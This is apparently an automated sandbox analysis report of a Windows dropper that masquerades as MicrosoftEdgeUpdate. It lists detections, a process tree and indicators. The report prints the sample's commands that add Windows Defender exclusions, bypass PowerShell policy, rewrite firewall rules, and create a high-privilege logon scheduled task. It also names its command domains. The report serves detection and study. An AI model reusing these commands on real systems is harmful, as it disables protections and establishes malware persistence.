
Windows Analysis Report
SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe
Analysis ID: 1545319
MD5: a9a01bcaf4ffeddb26fd9fc79f0b57c4
SHA1: becb33e475352ad604ea851038cec53d2d15b047
SHA256: 64be2f3a38522ca4b5f4d7887cd5832363f00d1a07b8bb531424bf6e81939fce
Tags: exe

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Drops executable to a common third party application directory
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
PE file contains section with special chars
PE file has nameless sections
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses netsh to modify the Windows network and firewall settings
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Potential browser exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe (PID: 6764 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe" MD5: A9A01BCAF4FFEDDB26FD9FC79F0B57C4)
    • conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6176 cmdline: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4208 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • cmd.exe (PID: 7156 cmdline: "cmd.exe" /c schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAA-BD9C-FC4F0859F018}" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4408 cmdline: schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAA-BD9C-FC4F0859F018}" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 928 cmdline: "cmd.exe" /c schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7096 cmdline: schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • MicrosoftEdgeUpdate.exe (PID: 280 cmdline: "C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe" MD5: 962DB502E0DB073CAEB3A49FC7007776)
      • iexplore.exe (PID: 5500 cmdline: "C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" MD5: 9B4B06703C314B8BD494570F443A74AE)
        • conhost.exe (PID: 1352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • iexplore.exe (PID: 6256 cmdline: "C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" MD5: 9B4B06703C314B8BD494570F443A74AE)
      • WerFault.exe (PID: 5480 cmdline: C:\Windows\system32\WerFault.exe -u -p 280 -s 1376 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • Bound.exe (PID: 5180 cmdline: "C:\ProgramData\Microsoft\Bound.exe" MD5: A1F8A5C21AFC60D046C9075E41BB36A4)
      • powershell.exe (PID: 4308 cmdline: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall delete rule name=all dir=in program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 3900 cmdline: "C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name=all dir=in "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • powershell.exe (PID: 6376 cmdline: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall delete rule name=all dir=out program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 2688 cmdline: "C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name=all dir=out "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • powershell.exe (PID: 736 cmdline: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall add rule name='Allow Internet Explorer Inbound' dir=in action=allow program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe' enable=yes profile=private,public" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 5184 cmdline: "C:\Windows\system32\netsh.exe" advfirewall firewall add rule "name=Allow Internet Explorer Inbound" dir=in action=allow "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" enable=yes profile=private,public MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • powershell.exe (PID: 5900 cmdline: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall add rule name='Allow Internet Explorer Outbound' dir=out action=allow program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe' enable=yes profile=private,public" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 3352 cmdline: "C:\Windows\system32\netsh.exe" advfirewall firewall add rule "name=Allow Internet Explorer Outbound" dir=out action=allow "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" enable=yes profile=private,public MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 3588 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp8B5F.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 1208 cmdline: ping 127.0.0.1 -n 2 MD5: 2F46799D79D22AC72C241EC0322B011D)
    • cmd.exe (PID: 404 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\selfdelete.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started. Author: Jonathan Cheong, oscd.community. Data: Command: "cmd.exe" /c schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /f, CommandLine: "cmd.exe" /c schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, ParentProcessId: 6764, ParentProcessName: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, ProcessCommandLine: "cmd.exe" /c schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /f, ProcessId: 928, ProcessName: cmd.exe
Source: Process started. Author: Florian Roth (Nextron Systems). Data: Command: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'", CommandLine: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, ParentProcessId: 6764, ParentProcessName: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, ProcessCommandLine: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'", ProcessId: 6176, ProcessName: powershell.exe
Source: Process started. Author: frack113. Data: Command: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'", CommandLine: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, ParentProcessId: 6764, ParentProcessName: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, ProcessCommandLine: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'", ProcessId: 6176, ProcessName: powershell.exe
Source: Process started. Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements). Data: Command: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'", CommandLine: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, ParentProcessId: 6764, ParentProcessName: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, ProcessCommandLine: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'", ProcessId: 6176, ProcessName: powershell.exe
No Suricata rule has matched


AV Detection

Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe; Avira: detected
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe; Avira: detection malicious, Label: TR/AVI.Agent.rrfxm
Source: C:\ProgramData\Microsoft\Bound.exe; Avira: detection malicious, Label: TR/AVI.Agent.lvnlf
Source: C:\ProgramData\Microsoft\Bound.exe; ReversingLabs: Detection: 62%
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe; ReversingLabs: Detection: 58%
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe; ReversingLabs: Detection: 42%
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe; ReversingLabs: Detection: 62%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 98.1% probability
Source: C:\ProgramData\Microsoft\Bound.exe; Joe Sandbox ML: detected
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe; Joe Sandbox ML: detected
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: API-MS-Win-Core-Util-L1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.15.dr
Source: Binary string: API-MS-Win-Core-DateTime-L1-1-0.pdb source: api-ms-win-core-datetime-l1-1-0.dll.15.dr
Source: Binary string: C:\A\18\s\PCbuild\win32\_hashlib.pdb source: _hashlib.pyd.15.dr
Source: Binary string: MlcrosoftEdgeUpdate.pdb source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: C:\Windows\MlcrosoftEdgeUpdate.pdbpdbate.pdbw source: MicrosoftEdgeUpdate.exe, 0000000E.00000002.2210782859.000001B9FFDEC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: API-MS-Win-Core-Handle-L1-1-0.pdb3 source: api-ms-win-core-handle-l1-1-0.dll.15.dr
Source: Binary string: C:\A\18\s\PCbuild\win32\_socket.pdb source: _socket.pyd.15.dr
Source: Binary string: System.ni.pdbRSDS source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: C:\codes\bound\KillDefender\obj\Debug\MlcrosoftEdgeUpdate.pdb source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, 00000000.00000002.2238150261.0000021C1D86E000.00000004.00000800.00020000.00000000.sdmp, Bound.exe, 00000012.00000000.1960600687.00000212527C2000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.15.dr
Source: Binary string: API-MS-Win-Core-NamedPipe-L1-1-0.pdb3 source: api-ms-win-core-namedpipe-l1-1-0.dll.15.dr
Source: Binary string: API-MS-Win-Core-ProcessEnvironment-L1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.15.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: API-MS-Win-Core-DateTime-L1-1-0.pdb3 source: api-ms-win-core-datetime-l1-1-0.dll.15.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.15.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.15.dr
Source: Binary string: API-MS-Win-Core-ProcessEnvironment-L1-1-0.pdb3 source: api-ms-win-core-processenvironment-l1-1-0.dll.15.dr
Source: Binary string: System.pdb source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: API-MS-Win-Core-NamedPipe-L1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.15.dr
Source: Binary string: System.Core.ni.pdb source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: API-MS-Win-Core-Util-L1-1-0.pdb3 source: api-ms-win-core-util-l1-1-0.dll.15.dr
Source: Binary string: API-MS-Win-Core-Handle-L1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.15.dr
Source: Binary string: C:\A\18\s\PCbuild\win32\select.pdb source: select.pyd.15.dr
Source: Binary string: C:\A\18\s\PCbuild\win32\_elementtree.pdb source: _elementtree.pyd.15.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.15.dr
Source: Binary string: mscorlib.pdb source: MicrosoftEdgeUpdate.exe, 0000000E.00000002.2200183352.000001B9E751E000.00000004.00000800.00020000.00000000.sdmp, WERF1FE.tmp.dmp.22.dr
Source: Binary string: C:\A\18\s\PCbuild\win32\python37.pdb source: python37.dll.15.dr
Source: Binary string: C:\codes\start\KillDefender\obj\Debug\MlcrosoftEdgeUpdate.pdb.-H- :-_CorExeMainmscoree.dll source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, 00000000.00000002.2238150261.0000021C1D872000.00000004.00000800.00020000.00000000.sdmp, MicrosoftEdgeUpdate.exe, 0000000E.00000002.2210782859.000001B9FFDEC000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdate.exe, 0000000E.00000000.1954911715.000001B9E5942000.00000002.00000001.01000000.00000008.sdmp, MicrosoftEdgeUpdate.exe, 0000000E.00000002.2200183352.000001B9E751E000.00000004.00000800.00020000.00000000.sdmp, MicrosoftEdgeUpdate.exe.0.dr
Source: Binary string: C:\codes\start\KillDefender\obj\Debug\MlcrosoftEdgeUpdate.pdb source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, 00000000.00000002.2238150261.0000021C1D872000.00000004.00000800.00020000.00000000.sdmp, MicrosoftEdgeUpdate.exe, 0000000E.00000002.2210782859.000001B9FFDEC000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdate.exe, 0000000E.00000000.1954911715.000001B9E5942000.00000002.00000001.01000000.00000008.sdmp, MicrosoftEdgeUpdate.exe, 0000000E.00000002.2200183352.000001B9E751E000.00000004.00000800.00020000.00000000.sdmp, MicrosoftEdgeUpdate.exe.0.dr
Source: Binary string: mscorlib.ni.pdb source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: C:\A\18\s\PCbuild\win32\_ctypes.pdb source: _ctypes.pyd.15.dr
Source: Binary string: System.Core.pdb source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: System.ni.pdb source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERF1FE.tmp.dmp.22.dr
Source: C:\ProgramData\Microsoft\Bound.exe; Code function: 4x nop then jmp 00007FFD9BAD0CCBh 18_2_00007FFD9BAD0488
Source: C:\ProgramData\Microsoft\Bound.exe; Code function: 4x nop then jmp 00007FFD9BAD0CCBh 18_2_00007FFD9BAD0AAD
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe; Process created: C:\Windows\System32\conhost.exe

Networking

Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: unknown; DNS traffic detected: query: nt89s.kro.kr replaycode: Name error (3)
Source: unknown; DNS traffic detected: query: nt89.kro.kr replaycode: Name error (3)
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: nt89s.kro.kr
Source: global traffic; DNS traffic detected: DNS query: nt89.kro.kr
Source: __init__.py4.15.drString found in binary or memory: https://numpy.org/doc/stable/user/basics.subclassing.html
Source: cv2.pyd.15.drString found in binary or memory: https://onnx.ai/
Source: cv2.pyd.15.drString found in binary or memory: https://onnx.ai/)
Source: cv2.pyd.15.drString found in binary or memory: https://pjreddie.com/darknet/
Source: cv2.pyd.15.drString found in binary or memory: https://pjreddie.com/darknet/)
Source: cv2.pyd.15.drString found in binary or memory: https://software.intel.com/openvino-toolkit)
Source: cv2.pyd.15.drString found in binary or memory: https://static.aminer.org/pdf/PDF/000/317/196/spatio_temporal_wiener_filtering_of_image_sequences_us
Source: select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, python37.dll.15.dr, _ctypes.pyd.15.dr, _elementtree.pyd.15.drString found in binary or memory: https://www.digicert.com/CPS0
Source: cv2.pyd.15.drString found in binary or memory: https://www.learnopencv.com/convex-hull-using-opencv-in-python-and-c/
Source: cv2.pyd.15.drString found in binary or memory: https://www.learnopencv.com/convex-hull-using-opencv-in-python-and-c/nativeVectorWidthIntdecode(img
Source: cv2.pyd.15.drString found in binary or memory: https://www.tensorflow.org/
Source: cv2.pyd.15.drString found in binary or memory: https://www.tensorflow.org/)
Source: cv2.pyd.15.drString found in binary or memory: https://www.tensorflow.org/lite

System Summary

Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Static PE information: section name: =0aP
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Static PE information: section name:
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 280 -s 1376
Source: opencv_videoio_ffmpeg480.dll.15.dr | Static PE information: Number of sections : 11 > 10
Source: libopenblas.VTYUM5MXKVFE4PZZER3L7PNO6YB4XFF3.gfortran-win32.dll.15.dr | Static PE information: Number of sections : 18 > 10
Source: api-ms-win-core-file-l2-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: python3.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.15.dr | Static PE information: No import functions for PE file found
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, 00000000.00000002.2238150261.0000021C1D872000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMlcrosoftEdgeUpdate.exeH vs SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, 00000000.00000000.1697839610.0000021C1BB52000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameinstaller1.exe6 vs SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, 00000000.00000002.2238150261.0000021C1D86E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMlcrosoftEdgeUpdate.exeH vs SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.evad.winEXE@55/112@18/1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3760:120:WilError_03
